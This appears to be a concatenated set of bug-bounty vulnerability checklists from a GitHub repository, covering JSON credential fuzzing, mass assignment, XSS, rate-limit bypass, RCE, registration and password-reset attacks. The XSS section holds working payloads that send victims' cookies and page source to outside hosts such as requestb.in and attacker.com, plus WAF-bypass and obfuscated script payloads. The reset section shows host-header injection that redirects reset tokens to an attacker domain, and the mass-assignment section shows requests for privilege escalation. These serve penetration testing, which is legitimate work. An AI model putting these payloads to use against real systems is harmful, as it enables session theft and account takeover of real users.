437 | 60. Testing with greater than and less than signs:
438 | ```
439 | {
440 | "login": "admin>1",
441 | "password": "<password"
442 | }
443 | ```
444 |
445 | 61. Testing with parentheses in credentials:
446 | ```
447 | {
448 | "login": "(admin)",
449 | "password": "(password)"
450 | }
451 | ```
452 |
453 | 62. Credentials containing slashes:
454 | ```
455 | {
456 | "login": "admin/user",
457 | "password": "pass/word"
458 | }
459 | ```
460 |
461 | 63. Credentials containing multiple data types:
462 | ```
463 | {
464 | "login": ["admin",
465 | 123,
466 | true,
467 | null,
468 | {"username": ["admin"],
469 | "password": ["password",
470 | 123,
471 | false,
472 | null,
473 | {"password": "password"]}}
474 | }
475 | ```
476 |
477 | 64. Using escape sequences:
478 | ```
479 | {
480 | "login": "admin\\r\\n\\t",
481 | "password": "password\\r\\n\\t"
482 | }
483 | ```
484 |
485 | 65. Using curly braces in strings:
486 | ```
487 | {
488 | "login": "{admin}",
489 | "password": "{password}"
490 | }
491 | ```
492 |
493 | 66. Using square brackets in strings:
494 | ```
495 | {
496 | "login": "[admin]",
497 | "password": "[password]"
498 | }
499 | ```
500 |
501 | 68. Strings with only special characters:
502 | ```
503 | {
504 | "login": "!@#$%^&*()",
505 | "password": "!@#$%^&*()"
506 | }
507 | ```
508 |
509 | 69. Strings with control characters:
510 | ```
511 | {
512 | "login": "admin\b\f\n\r\t\v\0",
513 | "password": "password\b\f\n\r\t\v\0"
514 | }
515 | ```
516 |
517 | 71. Null characters in strings:
518 | ```
519 | {
520 | "login": "admin\0",
521 | "password": "password\0"
522 | }
523 | ```
524 |
525 | 72. Exponential numbers as strings:
526 | ```
527 | {
528 | "login": "1e5",
529 | "password": "1e10"
530 | }
531 | ```
532 |
533 | 73. Hexadecimal numbers as strings:
534 | ```
535 | {
536 | "login": "0xabc",
537 | "password": "0x123"
538 | }
539 | ```
540 |
541 | 74. Leading zeros in numeric strings:
542 | ```
543 | {
544 | "login": "000123",
545 | "password": "000456"
546 | }
547 | ```
548 |
549 | 75. Multilingual input (here, English and Korean):
550 | ```
551 | {
552 | "login": "admin관리ìž",
553 | "password": "password비밀번호"
554 | }
555 | ```
556 | 76. Extremely long keys:
557 | ```
558 | {
559 | "a"*10000: "admin",
560 | "b"*10000: "password"
561 | }
562 | ```
563 |
564 | 78. Extremely long unicode strings:
565 | ```
566 | {
567 | "login": "\u0061"*10000,
568 | "password": "\u0062"*10000
569 | }
570 | ```
571 |
572 | 79. JSON strings with semicolon:
573 | ```
574 | {
575 | "login": "admin;",
576 | "password": "password;"
577 | }
578 | ```
579 |
580 | 80. JSON strings with backticks:
581 | ```
582 | {
583 | "login": "`admin`",
584 | "password": "`password`"
585 | }
586 | ```
587 |
588 | 81. JSON strings with plus sign:
589 | ```
590 | {
591 | "login": "admin+",
592 | "password": "password+"
593 | }
594 | ```
595 |
596 | 82. JSON strings with equal sign:
597 | ```
598 | {
599 | "login": "admin=",
600 | "password": "password="
601 | }
602 | ```
603 | 83. Strings with Asterisk (*) Symbol:
604 | ```
605 | {
606 | "login": "admin*",
607 | "password": "password*"
608 | }
609 | ```
610 |
611 | 84. JSON containing JavaScript code:
612 | ```
613 | {
614 | "login": "admin<script>alert('hi')</script>",
615 | "password": "password"
616 | }
617 | ```
618 |
619 | 85. Negative numbers as strings:
620 | ```
621 | {
622 | "login": "-123",
623 | "password": "-456"
624 | }
625 | ```
626 |
627 | 86. Values as URLs:
628 | ```
629 | {
630 | "login": "https://admin.com",
631 | "password": "https://password.com"
632 | }
633 | ```
634 |
635 | 87. Strings with email format:
636 | ```
637 | {
638 | "login": "admin@admin.com",
639 | "password": "password@password.com"
640 | }
641 | ```
642 | 88. Strings with IP address format:
643 | ```
644 | {
645 | "login": "192.0.2.0",
646 | "password": "203.0.113.0"
647 | }
648 | ```
649 |
650 | 89. Strings with date format:
651 | ```
652 | {
653 | "login": "2023-08-03",
654 | "password": "2023-08-04"
655 | }
656 | ```
657 |
658 | 90. JSON with exponential values:
659 | ```
660 | {
661 | "login": 1e+30,
662 | "password": 1e+30
663 | }
664 | ```
665 |
666 | 91. JSON with negative exponential values:
667 | ```
668 | {
669 | "login": -1e+30,
670 | "password": -1e+30
671 | }
672 | ```
673 |
674 | 92. Using Zero Width Space (U+200B) in strings:
675 | ```
676 | {
677 | "login": "admin​",
678 | "password": "password​"
679 | }
680 | ```
681 |
682 | 93. Using Zero Width Joiner (U+200D) in strings:
683 | ```
684 | {
685 | "login": "adminâ€",
686 | "password": "passwordâ€"
687 | }
688 | ```
689 |
690 | 94. JSON with extremely large numbers:
691 | ```
692 | {
693 | "login": 12345678901234567890,
694 | "password": 12345678901234567890
695 | }
696 | ```
697 |
698 | 95. Strings with backspace characters:
699 | ```
700 | {
701 | "login": "admin\b",
702 | "password": "password\b"
703 | }
704 | ```
705 |
706 | 96. Test with emoji in strings:
707 | ```
708 | {
709 | "login": "admin😀",
710 | "password": "password😀"
711 | }
712 | ```
713 |
714 | 97. JSON with comments, although they are not officially supported in JSON:
715 | ```
716 | {
717 | /*"login": "admin",
718 | "password": "password"*/
719 | }
720 | ```
721 |
722 | 98. JSON with base64 encoded values:
723 | ```
724 | {
725 | "login": "YWRtaW4=",
726 | "password": "cGFzc3dvcmQ="
727 | }
728 | ```
729 |
730 | 99. Including null byte character (may cause truncation):
731 | ```
732 | {
733 | "login": "admin\0",
734 | "password": "password\0"
735 | }
736 | ```
737 |
738 | 100. JSON with credentials in scientific notation:
739 | ```
740 | {
741 | "login": 1e100,
742 | "password": 1e100
743 | }
744 | ```
745 |
746 | 102. Strings with octal values:
747 | ```
748 | {
749 | "login": "\141\144\155\151\156",
750 | "password":"\160\141\163\163\167\157\162\144"
751 | }
752 | ```
753 | 103. writeup
754 | ```
755 | {
756 | root:{
757 | "username": "admin",
758 | "password":"admin"
759 | }
760 | }
761 | ```
762 |
763 | 104. writeup
764 | ```
765 | basic => username=admin
766 | username[]=admin
767 | username[0]=admin
768 | username=admin&username=admin
769 | delete username=admin
770 |
771 | ```
772 |
--------------------------------------------------------------------------------
/Mass Assignment/Mass.md:
--------------------------------------------------------------------------------
1 | **Try This Vulnerability in**
2 | ```
3 | Account Registration
4 | Unauthorized Access to Organizations
5 | reset password
6 | login
7 | change email
8 | change username
9 | ```
10 | **Account Registration**
11 | the basic request
12 | ```
13 | POST /api/v1/register
14 | --snip--
15 | {
16 | "username":"hAPI_hacker",
17 | "email":"hapi@hacker.com",
18 | "password":"Password1!"
19 | }
20 | ```
21 |
22 | try
23 | 1-
24 | ```
25 | POST /api/v1/register
26 | --snip--
27 | {
28 | "username":"hAPI_hacker",
29 | "email":"hapi@hacker.com",
30 | "admin": true,
31 | "password":"Password1!"
32 | }
33 | ```
34 | 2-
35 | ```
36 | POST /api/v1/register
37 | --snip--
38 | {
39 | "username":"hAPI_hacker",
40 | "email":"hapi@hacker.com",
41 | "ADMIN": true,
42 | "password":"Password1!"
43 | }
44 | ```
45 |
46 | 3-
47 | ```
48 | POST /api/v1/register
49 | --snip--
50 | {
51 | "username":"hAPI_hacker",
52 | "email":"hapi@hacker.com",
53 | "isadmin": true,
54 | "password":"Password1!"
55 | }
56 | ```
57 |
58 | 4-
59 | ```
60 | POST /api/v1/register
61 | --snip--
62 | {
63 | "username":"hAPI_hacker",
64 | "email":"hapi@hacker.com",
65 | "ISADMIN": true,
66 | "password":"Password1!"
67 | }
68 | ```
69 |
70 | 5-
71 | ```
72 | POST /api/v1/register
73 | --snip--
74 | {
75 | "username":"hAPI_hacker",
76 | "email":"hapi@hacker.com",
77 | "Admin": true,
78 | "password":"Password1!"
79 | }
80 | ```
81 |
82 | 6-
83 | ```
84 | POST /api/v1/register
85 | --snip--
86 | {
87 | "username":"hAPI_hacker",
88 | "email":"hapi@hacker.com",
89 | "role": admin,
90 | "password":"Password1!"
91 | }
92 | ```
93 |
94 | 7-
95 | ```
96 | POST /api/v1/register
97 | --snip--
98 | {
99 | "username":"hAPI_hacker",
100 | "email":"hapi@hacker.com",
101 | "role": ADMIN,
102 | "password":"Password1!"
103 | }
104 | ```
105 |
106 | 8-
107 | ```
108 | POST /api/v1/register
109 | --snip--
110 | {
111 | "username":"hAPI_hacker",
112 | "email":"hapi@hacker.com",
113 | "role": administrator,
114 | "password":"Password1!"
115 | }
116 | ```
117 |
118 | 9-
119 | ```
120 | POST /api/v1/register
121 | --snip--
122 | {
123 | "username":"hAPI_hacker",
124 | "email":"hapi@hacker.com",
125 | "user_priv": administrator,
126 | "password":"Password1!"
127 | }
128 | ```
129 |
130 | 10-
131 | ```
132 | POST /api/v1/register
133 | --snip--
134 | {
135 | "username":"hAPI_hacker",
136 | "email":"hapi@hacker.com",
137 | "user_priv": admin,
138 | "password":"Password1!"
139 | }
140 | ```
141 |
142 | 11-
143 | ```
144 | POST /api/v1/register
145 | --snip--
146 | {
147 | "username":"hAPI_hacker",
148 | "email":"hapi@hacker.com",
149 | "admin": 1,
150 | "password":"Password1!"
151 | }
152 | ```
153 |
154 | **Unauthorized Access to Organizations**
155 | ```
156 | POST /api/v1/register
157 | --snip--
158 | {
159 | "username":"hAPI_hacker",
160 | "email":"hapi@hacker.com",
161 | "org": "§CompanyA§",
162 | "password":"Password1!"
163 | }
164 | ```
165 |
166 | **Finding Variables in Documentation**
167 | ```
168 | by reading the document you can find variable
169 | ```
170 |
171 | **Fuzzing Unknown Variables**
172 | ```
173 | Another common scenario is that you’ll perform an action in a web applica�tion, intercept the request, and locate several bonus headers or parameters
174 | within it, like so:
175 |
176 | POST /create/user
177 | --snip--
178 | {
179 | "username": "hapi_hacker"
180 | "pass": "ff7ftw",
181 | "uam": 1,
182 | "mfa": true,
183 | "account": 101
184 | }
185 | ```
186 |
187 | Automating Mass Assignment Attacks with Arjun and burp Suite Intruder
188 | ```
189 | arjun --headers "Content-Type: application/json]" -u http://vulnhost.com/api/register -m JSON --include='{$arjun$}'
190 | ```
191 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # vulnerability-Checklist
2 | This repo contain a lot of vulnerability checklist
3 | 1. [AEM misconfiguration](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Aem%20misconfiguration/aem.md)
4 | 2. [Authentication](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Authentication/authentication.md)
5 | 3. [IDOR](https://github.com/Az0x7/vulnerability-Checklist/blob/main/IDOR%20Vulnerability/idor.md)
6 | 4. [Business Logic](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Bussiness%20Logic/bussiness%20logic.md)
7 | 5. [jire vulnerability](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Jire%20Vulnerability/jire.md)
8 | 6. [register vulnerability](https://github.com/Az0x7/vulnerability-Checklist/blob/main/register%20vulnerability/register.md)
9 | 7. [2FA bypassing](https://github.com/Az0x7/vulnerability-Checklist/blob/main/2FA%20Bypass/2FA%20bypass.md)
10 | 8. [admin panal.md](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Admin%20panal/adminpanal.md)
11 | 9. [exif vulnerability ](https://github.com/Az0x7/vulnerability-Checklist/blob/main/exif%20Vulnerability/exif_geo.md)
12 | 10. [cookie attack](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Cookie%20%20Attack/cookie.md)
13 | 11. [reset password attack](https://github.com/Az0x7/vulnerability-Checklist/blob/main/reset%20password/reset_password_checklist.md)
14 | 12. [Acount takeover checklist ](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Acount%20takeover/ATO.md)
15 |
16 | 13. [403 bypass checklist](https://github.com/Az0x7/vulnerability-Checklist/blob/main/403%20Bypass/403-bypass.md)
17 |
18 | 14. [tips from twitter](https://github.com/Az0x7/vulnerability-Checklist/blob/main/tips%20from%20twitter%20/tips_twitter.md)
19 |
20 | 15. [tips from twitter p 2](https://github.com/Az0x7/vulnerability-Checklist/blob/main/tips%20from%20twitter/tips_twitter_P2.md)
21 | 16. [Sql injection](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Sql%20injection/sqlpayload.txt)
22 | 17. [xss](https://github.com/Az0x7/vulnerability-Checklist/blob/main/RXSS/xss.md)
23 |
24 | 18. [File Upload](https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/File%20Upload.md)
25 |
26 | 19. [rate limit](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Rate%20limit/bypass%20rate%20limit.md)
27 |
28 | 20. [json attack](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Json%20Attack/json.md)
29 |
30 | 21. [Csrf](https://github.com/Az0x7/vulnerability-Checklist/blob/main/CSRF/csrf.md)
31 | 22. [RCE](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Rce/Rce.md)
32 |
33 | 23. [API AUTHORIZATION](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Api%20Authorization/Authorization.md)
34 | 24. [API Authentication](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Api%20Authentication%20/Authentication.md)
35 | 25. [MASS ASSIGNMENT](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Mass%20Assignment/Mass.md)
36 |
37 | 26. [Django checklist](https://github.com/Az0x7/vulnerability-Checklist/blob/main/Hacking%20Django)
38 |
39 | 27. [Hacking Symfony](https://github.com/Az0x7/vulnerability-Checklist/tree/main/Hacking%20Symfony)
40 |
--------------------------------------------------------------------------------
/RXSS/xss.md:
--------------------------------------------------------------------------------
1 | [ ] Tools
2 | ```
3 | https://github.com/DanMcInerney/xsscrapy
4 | https://github.com/s0md3v/XSStrike
5 | # Cross Site Scripting detection suite equipped with parsers
6 | # XSStrike analyses the response with multiple parsers and then crafts payloads
7 | # that are guaranteed to work by context analysis integrated with a fuzzing engine
8 |
9 | # Documentation
10 | https://github.com/s0md3v/XSStrike/wiki/Usage
11 |
12 | # Classical GET
13 | python xsstrike.py -u "http://example.com/search.php?q=query"
14 |
15 | # POST
16 | python xsstrike.py -u "http://example.com/search.php" --data "q=query"
17 |
18 | # Path payloads
19 | python xsstrike.py -u "http://example.com/search/form/query" --path
20 |
21 | # Crawl and test
22 | python xsstrike.py -u "http://example.com/page.php" --crawl
23 |
24 | # Load payloads from file and test them
25 | python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt
26 |
27 | # Find hidden parameters
28 | python xsstrike.py -u "http://example.com/page.php" --params
29 |
30 | ```
31 | [ ] automate Rxss
32 | ### method uniq
33 | ```
34 | https://github.com/yavolo/eventlistener-xss-recon
35 | ```
36 | ### first method
37 | ```
38 |
39 | - collect a sub domain (AssetFinder - SubFinder – Amass – Find-domain - Google Dorking)
40 |
41 | - find the number of sub-domains which are active ( `httprobe (Tomnomnom) – HTTPX ) >> cat subdomains.txt | httprobe | tee -a host.txt
42 |
43 | - use your payloads :`` <script/src=//NJ.₨></script>
44 |
45 | - your report if not acceptd
46 |
47 | - cat host.txt | crawler | tee -a endpoint.txt & cat host.txt | waybackurl | tee -a endpoint.txt
48 |
49 | - After finding all the 50 Lakh endpoint I started to fuzz all the parameters to find xss vulnerability with the help of the tool qsreplace. The command used was:
50 |
51 | cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt
52 |
53 | - After executing the command now, I had to check the number of parameters have been reflecting our payload into a plain text weather or not, So I created a tool named FREQ which is also available in my GitHub repo. So, the tool sends multiple requests to the check whether the response containing the payload return us with the affected URLs. The command used to perform this attack was:
54 |
55 | cat xss_fuzz.txt | freq | tee -a possible_xss.txt
56 |
57 | ```
58 |
59 | ### second method
60 | ```
61 | cleanP : github.com/raoufmaklouf/c…
62 |
63 | injectP: github.com/raoufmaklouf/i…
64 |
65 | XSS.yaml : gist.githubusercontent.com/raoufmaklouf/7…
66 |
67 | - single target: `gau target.com | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt
68 | &
69 | - cat AllEndPoint.txt | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt
70 | ```
71 |
72 | ### third method
73 | ```
74 | irst of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and
75 | then subdomain brute-forcing with [knockpy](https://github.com/guelfoweb/knock),
76 | then I used [waybackurls](https://github.com/tomnomnom/waybackurls) to get parameters to test for XSS and then I used [gf](https://github.com/tomnomnom/gf) to get possible XSS parameters.
77 | after sorting the URLs I used [KXSS](https://github.com/Emoe/kxss)
78 | And [Dalfox](https://github.com/hahwul/dalfox). Bad luck I got nothing.
79 | ```
80 |
81 | ### Four method
82 | ```
83 | https://mirror-medium.com/?m=https://medium.com/@c0nqr0r/reading-robots-txt-got-me-4-xss-reports-9fd2234c635f&fbclid=IwAR1Z9wF54pIr0l3uLd9xLxiip3gbiWPDo-CFkNaGtrM7FTrLXDBzfI8pqKw
84 | ```
85 |
86 | [ ] Tips
87 | ```
88 | # If XSS is not executed through the UI, you can try to insert it through the API
89 | # It can then fire on the UI. Many filters are not present like this
90 | ```
91 |
92 | ### Payloads
93 | ```
94 | # Document.location
95 | <script>document.location('http://IP_EXTERNE/'+document.cookie)</script>
96 | <script>document.location.href = 'http://requestb.in/XXXXXX?cookies =' + document.cookie;</script>
97 |
98 | # Window
99 | <script>window.open("http://monserveur/Cookie="+document.cookie)</script>
100 | <script>window.location='http://monsite.free.fr/script.php?cookies='+(document.cookie);</script>
101 |
102 | # Document.write
103 | <script>document.write('<img src="https://requestb.in/xxxxx?cookie="+document.cookie>admin</img>');</script>
104 | admin"></i>)</span><script>document.write("<img src=http://requestb.in/XXXXX?cookie=".concat(encodeURI(document.cookie)).concat("/>"))</script><i>
105 |
106 | <script>var xhr = new XMLHttpRequest();xhr.open('POST', 'http://requestb.in/w0sw22w0', true);xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xhr.send(document.cookie);</script>
107 |
108 | # alert(1) in JS
109 | <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
110 |
111 | injecting inside of input tags
112 | <input/onfocus=alert(0) autofocus>
113 | <input/onfocus=alert`0` autofocus>
114 | <input/onfocus=prompt`0` autofocus>
115 | 1'"><input/onfocus={alert`1`} autofocus>
116 | ```
117 |
118 | ```
119 | # WAF Bypass
120 | '';!--"<XSS>=&{()}
121 | <IMG SRC="javascript:alert('XSS');">
122 | <IMG SRC="jav	ascript:alert('XSS');">
123 | <IMG SRC="jav
ascript:alert('XSS');">
124 | <IMG SRC="jav
ascript:alert('XSS');">
125 | <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
126 | <svg/onload=(((confirm(1))))>
127 | confirm()
128 | confirm``
129 | (confirm``)
130 | {confirm``}
131 | [confirm``]
132 | (((confirm)))``
133 | co\u006efirm()
134 | new class extends confirm``{}
135 | [8].find(confirm)
136 | [8].map(confirm)
137 | [8].some(confirm)
138 | [8].every(confirm)
139 | [8].filter(confirm)
140 | [8].findIndex(confirm)
141 |
142 | # No HTML events
143 | <script>alert(1)//
144 | <script>alert(1)<!--
145 | <script>alert(1)%0A-->
146 | <script src=data:,alert(1)>
147 | <script src=//HOST/FILE>
148 | <script src=https:DOMAIN/FILE>
149 | <svg><script xlink:href=//HOST/FILE>
150 | <svg><script xlink:href=https:DOMAIN/FILE>
151 | <svg><script xlink:href=data:,alert(1)>
152 | <svg/onload=(confirm(1))>
153 | <svg/onload=confirm(1)>
154 |
155 | # Stealing the source code without triggering browser restrictions
156 | <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
157 |
158 | # Non alphanumeric alert() payload
159 | Ð=[],Ř=+!+Ð,ˍ=Ř+Ř+Ř,Š=!!Ð+Ð,Ť=!Ð+Ð,Ǎ=(!Ð+{})[Ř+[+Ð]],Č=(Ð+{})[Ř],Ȟ=Š[Ř],Ě=Š[+Ð],_=Ť[ˍ]+Č+Ȟ+Ě,ǰ=Ð[_]+Ð,š=Ð[Ð]+Ð,Ð[_][Ǎ+Č+(š)[Ř]+Ť[ˍ]+Ě+Ȟ+(š)[+Ð]+Ǎ+Ě+Č+Ȟ](Ť[Ř]+Ť[Ř+Ř]+Š[ˍ]+Ȟ+Ě+ǰ[Ř+[ˍ]]+ǰ[Ř+[ˍ+Ř]])()
160 |
161 |
162 | ```
163 |
--------------------------------------------------------------------------------
/Rate limit/bypass rate limit.md:
--------------------------------------------------------------------------------
1 | Where to look for Bugs
2 | ```
3 | - login
4 | - reset password
5 | - 2fA
6 | - Confirmation codes
7 | - Sign up
8 | ```
9 |
10 | using Null Chars
11 |
12 | ```
13 | %00, %0d%0a, %09, %0C, %20, %0
14 | ```
15 | ```
16 | >brute force using abc@xyz.com
17 | after some time
18 | you got blocked
19 | >try abc@xyz.com%00
20 | ```
21 |
22 | Host Header injection
23 |
24 | ```
25 | Change Host:www.newsite.com
26 | Change Host:localhost
27 | Change Host:127.0.0.1
28 | ```
29 |
30 |
31 | Changing cookies
32 | ```
33 | For example if it blocks by 15 Requests
34 | Change session on 14 req and try
35 | ```
36 |
37 |
38 | X-forwaded-forwaded-For
39 | ```
40 | X-Forwarded: <IP>
41 | X-Forwarded-For: <IP>
42 | X-Forwarded-Host: <IP>
43 | X-Client-IP: <IP>
44 | X-Remote-IP: <IP>
45 | X-Remote-Addr: <IP>
46 | X-Host: <IP>
47 | X-Originating-IP: <IP>
48 | ```
49 |
50 | X-forwaded-forwaded-For
51 | ```
52 | add 2 headers
53 | add Header X-Forwaded-For:
54 | add Header X-Forwaded-For:198.168.43.1
55 | ```
56 |
--------------------------------------------------------------------------------
/Rce/Rce.md:
--------------------------------------------------------------------------------
1 | 1- RCE via Dependency Confusion
2 | ```
3 | Writeup:-
4 | https://systemweakness.com/rce-via-dependency-confusion-e0ed2a127013
5 | https://chevonphillip.medium.com/rce-due-to-dependency-confusion-5000-bounty-fd1b294d645f
6 | https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
7 | https://hackerone.com/reports/1104693
8 | ```
9 |
10 | 2- rce via file upload
11 | ```
12 | Writeup:-
13 | https://book.hacktricks.xyz/pentesting-web/file-upload
14 | https://sidblog.medium.com/file-upload-to-rce-7c04b3b252de
15 | https://hackerone.com/reports/678727
16 | ```
17 |
18 | 3- rce via sql injection
19 | ```
20 | https://www.oxeye.io/resources/rce-through-sql-injection-vulnerability-in-hashicorps-vault
21 | https://systemweakness.com/sql-injection-to-remote-command-execution-rce-dd9a75292d1d
22 | ```
23 |
24 | 4- rce via lfi
25 | ```
26 | https://github.com/RoqueNight/LFI---RCE-Cheat-Sheet
27 | https://himanshugurjar-10413.medium.com/rce-via-lfi-log-poisoning-3a33632caf4a
28 | https://aditya-chauhan17.medium.com/local-file-inclusion-lfi-to-rce-7594e15870e1
29 | ```
30 |
31 | 5- rce via ssrf
32 | ```
33 | https://www.youtube.com/watch?v=Vj6oY6IaJdU
34 | https://infosecwriteups.com/exploiting-server-side-request-forgery-ssrf-vulnerability-faeb7ddf5d0e
35 | https://aditya-chauhan17.medium.com/server-side-request-forgery-ssrf-to-rce-c0cb5fc88a94
36 | ```
37 |
38 | 6- rce via xxe
39 | ```
40 | https://airman604.medium.com/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7
41 | https://www.youtube.com/watch?v=Gz4iPauycKs
42 | https://hackerone.com/reports/227880
43 | ```
44 |
45 | 7- rce via command injection
46 | ```
47 | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection#command-execution
48 | ```
49 |
50 | 8- rce via Insecure deserialization
51 | ```
52 | https://secure-cookie.io/attacks/insecuredeserialization/
53 | https://www.bugbountyhunter.com/hackevents/report?id=867
54 | https://www.bugbountyhunter.com/hackevents/report?id=776
55 | https://portswigger.net/web-security/deserialization/exploiting
56 | ```
57 |
58 | 9- rce via SSTI
59 | ```
60 | https://medium.com/r3d-buck3t/rce-with-server-side-template-injection-b9c5959ad31e
61 | https://github.com/epinna/tplmap
62 | https://secure-cookie.io/attacks/ssti/
63 | ```
64 |
--------------------------------------------------------------------------------
/exif Vulnerability/exif_geo.md:
--------------------------------------------------------------------------------
1 | <h4>Summary:</h4>
2 | When a user uploads an image in example.com, the uploaded image’s EXIF Geolocation Data does not gets stripped. As a result, anyone can get sensitive information of example.com users like their Geolocation, their Device information like Device Name, Version, Software & Software version used etc.
3 |
4 | <h4>Steps to reproduce:</h4>
5 |
6 | 1. Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg) <br>
7 | 2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s . <br>
8 | 3. Go to Upload option on the website <br>
9 | 4. Upload the image<br>
10 | 5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect , edit it as html )</br>
11 | 6. open it (http://exif.regex.info/exif.cgi)</br>
12 | 7. See wheather is that still showing exif data , if it is then Report it.
13 |
14 | # Reports (Hackerone)
15 |
16 | - [IDOR with Geolocation data not stripped from images](https://hackerone.com/reports/906907)
17 |
18 |
--------------------------------------------------------------------------------
/register vulnerability/register.md:
--------------------------------------------------------------------------------
1 | ## register vulnerability
2 | [ ] Duplicate registration overwrite existing user
3 | ```
4 | 1. create first account in application with email say abc@gmail.com and password
5 | 2. logout of the account and create another account with same email and different password
6 | 3. you can even try to change email case like from abc2gmail.com to Abc@gmail.com
7 | 4. finish the creation proccess and see that it succceed
8 | 5. now go back and try to login with email and the new password ,you are seccess logged in
9 | ```
10 | [ ] Dos at name /password field in sign up page
11 | ```
12 | 1. go to sign up form
13 | 2. fill the form and enter a long string in password
14 | 3. click on enter and you will get 500 internal server error if it is vulnerability
15 | ```
16 |
17 | [ ] no rate limit at signup page
18 | ```
19 | 1. enter your details in signuo form and submit the form
20 | 2. capture the signuo request and send it to intruder
21 | 3. add $ to email parameter
22 | 4. in the payload add different email address
23 | 5. fire up intruder and check whether it return 200 ok
24 | ```
25 |
26 | [ ] xss in username,email
27 | ```
28 | xss can be test in any of parameter
29 | 1. payload for text field:
30 | 2. payload for email field:
31 | 3. you can use bypassing filter
32 | ```
33 |
34 | [ ] email varification can be easily bypassed with following method
35 | ```
36 | 1. response manipulation change the bad respone with good one like false to true
37 | 2. status code manipulation change the 403 to 200
38 | ```
39 |
40 | [ ] weak register implemntation
41 | ```
42 | 1. check whether the allows disposable email addresses
43 | 2. register form on non-https page
44 | ```
45 |
46 | [ ] weak password policy
47 | ```
48 | 1. check whether application allows easily guessable passsword like 123456
49 | 2. check if you can use username same as the email address
50 | 3. check if can use password same as that email address
51 | 4. improperly implemented password recovery link functionality
52 | ```
53 |
54 | [ ] Path Overwrite
55 | ```
56 | If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php, now upon visiting target.tld/index.php, your profile will comeup and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting takeovered.
57 | ```
58 |
--------------------------------------------------------------------------------
/reset password/reset_password_checklist.md:
--------------------------------------------------------------------------------
1 | [ ] a lot of ideas in this article by **omer hesham**
2 | ```
3 | https://medium.com/bugbountywriteup/hubspot-full-account-takeover-in-bug-bounty-4e2047914ab5
4 | ```
5 |
6 | [ ] Use Your Token on Victims Email
7 | ```
8 | POST /reset
9 | ...
10 | ...
11 | email=victim@gmail.com&token=$YOUR-TOKEN$
12 |
13 | ```
14 |
15 | [ ] Host Header Injection
16 | ```
17 | POST /reset
18 | Host: attacker.com
19 | ...
20 | email=victim@gmail.com
21 | ```
22 |
23 | [ ] HTML injection in Host Header
24 | ```
25 | POST /reset
26 | Host: attacker">.com
27 | ...
28 | email=victim@gmail.com
29 | ```
30 |
31 | [ ] Leakage of Password reset in Referer Header
32 | ```
33 | Referrer: https://website.com/reset?token=1234
34 | ```
35 |
36 |
37 | [ ] Using Companies Email
38 | ```
39 | While inviting users into your account/organization, you can also try inviting company emails and add a
40 | new field "password": "example123". or "pass": "example123" in the request. you may end up resetting a
41 | user password
42 |
43 | Company emails can be found on target's GitHub Repos members or you can check on http://hunter.io. some users
44 | have a feature to set a password for invited emails, so here we can try adding a pass parameter.
45 |
46 | If successful, we can use those credentials to login into the account, SSO integrations, support panels,
47 | etc #BugBountyTips
48 | ```
49 |
50 | [ ] CRLF in URL
51 | ```
52 | with CLRF: /resetPassword?0a%0dHost:atracker.tld (x-host, true-client-ip, x-forwarded...)
53 | ```
54 |
55 | [ ] HTML injection in Email
56 | ```
57 | HTML injection in email via parameters, cookie, etc > inject image > leak the token
58 | ```
59 |
60 | [ ] Remove token
61 | ```
62 | http://example.com/reset?eamil=victims@gmail.com&token=
63 | ```
64 |
65 | [ ] Change it to 0000
66 | ```
67 | http://example.com/reset?eamil=victims@gmail.com&token=0000000000
68 | ```
69 |
70 | [ ] Use Null Value
71 | ```
72 | http://example.com/reset?eamil=victims@gmail.com&token=Null/nil
73 | ```
74 |
75 | [ ] try an array of old tokens
76 | ```
77 | http://example.com/reset?eamil=victims@gmail.com&token=[oldtoken1,oldtoken2]
78 | ```
79 |
80 | [ ] SQLi bypass
81 | ```
82 | try sqli bypass and wildcard or, %, *
83 | ```
84 |
85 | [ ] Request Method / Content Type
86 | ```
87 | change request method (get, put, post etc) and/or content type (xml<>json)
88 | ```
89 |
90 | [ ] Response Manipulation
91 | ```
92 | Replace bad response and replace with good one
93 | ```
94 |
95 | [ ] Massive Token
96 | ```
97 | http://example.com/reset?eamil=victims@gmail.com&token=1000000 long string
98 | ```
99 |
100 | [ ] Crossdomain Token Usage
101 | ```
102 | If a program has multiple domains using same underlying reset mechanism, reset token generated from one domain sometime
103 | works in another domain too.
104 | ```
